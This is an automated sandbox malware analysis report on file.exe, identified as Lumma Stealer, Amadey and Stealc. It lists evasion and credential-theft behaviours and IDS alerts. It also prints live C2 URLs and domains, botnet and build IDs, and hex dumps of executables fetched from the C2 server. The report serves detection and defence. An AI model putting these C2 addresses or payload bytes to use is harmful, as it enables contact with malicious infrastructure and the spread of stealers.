Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540246
MD5: df1b115ceeeb801e6987b690be5de396
SHA1: fde13ad5dca46dfb75934d89a90467d42c177472
SHA256: bd9db41e76c3c708f9fd9bad467d5c1f07e564cd419dcd07edaa11fab56df9cd
Tags: exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

barindex
Source: file.exe Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000006.00000003.2321093178.00000000053C0000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 35.2.num.exe.480000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: file.exe.5328.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["eaglepawnoy.store", "clearancek.site", "licendfilteo.site", "bathdoomgaz.store", "mobbipenju.store", "spirittunek.store", "dissapoiznw.store", "studennotediw.store"], "Build id": "4SD0y4--legendaryy"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe ReversingLabs: Detection: 47%
Source: file.exe ReversingLabs: Detection: 42%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\num[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\QDDSFWH7TPMYGYIMIOWX7SBOU5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\S14AV77TIR9DRWSCWIW0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000979001\num.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7RNKVR1EZ552XQ73.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000976001\976d9f40c1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000978001\2d569de7b1.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000977001\606f2f6db0.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:60559 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60568 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60573 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60605 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60606 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60609 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60638 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:60639 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:60640 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000002.2418802394.0000000000A32000.00000040.00000001.01000000.00000009.sdmp, QDDSFWH7TPMYGYIMIOWX7SBOU5.exe, 00000005.00000003.2283631779.0000000004700000.00000004.00001000.00020000.00000000.sdmp
Source: firefox.exe Memory has grown: Private usage: 1MB later: 193MB

Networking

barindex
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:60795 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:55808 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:54544 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:62507 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:62489 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56217 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:55511 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:52723 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49740 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.5:49945 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:49292 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:58046 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:52498 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:65031 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:50553 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.5:49961
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:50573 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:58684 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49989 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:59213 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:63391 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:60644 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:56873 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:57306 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:59560 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:64698 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:60489 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49991 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49994 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:49995 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.5:49650 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.5:52827 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.5:57069 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.5:64114 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:49266 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.5:55530 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:50003 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.5:50005 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:60556 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.5:53807 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60588 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60583 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:60598 -> 185.215.113.37:80
Source: Network traffic Suricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.5:50819 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.5:58297 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49711 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 172.67.206.204:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49988 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:60559 -> 104.102.49.254:443
Source: Network traffic Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49993 -> 104.102.49.254:443
Source: Malware configuration extractor URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor URLs: eaglepawnoy.store
Source: Malware configuration extractor URLs: clearancek.site
Source: Malware configuration extractor URLs: licendfilteo.site
Source: Malware configuration extractor URLs: bathdoomgaz.store
Source: Malware configuration extractor URLs: mobbipenju.store
Source: Malware configuration extractor URLs: spirittunek.store
Source: Malware configuration extractor URLs: dissapoiznw.store
Source: Malware configuration extractor URLs: studennotediw.store
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:18 GMTContent-Type: application/octet-streamContent-Length: 1926656Last-Modified: Wed, 23 Oct 2024 13:34:51 GMTConnection: keep-aliveETag: "6718fb7b-1d6600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 50 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 4c 00 00 04 00 00 ba 03 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 38 4c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 38 4c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 40 2b 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 70 74 70 67 62 62 67 6f 00 50 1a 00 00 f0 31 00 00 4a 1a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 70 69 6a 79 65 69 70 00 10 00 00 00 40 4c 00 00 06 00 00 00 3e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 4c 00 00 22 00 00 00 44 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 23 Oct 2024 13:48:21 GMTContent-Type: application/octet-streamContent-Length: 1825792Last-Modified: Wed, 23 Oct 2024 13:34:44 GMTConnection: keep-aliveETag: "6718fb74-1bdc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 e0 68 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 69 00 00 04 00 00 f0 c9 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 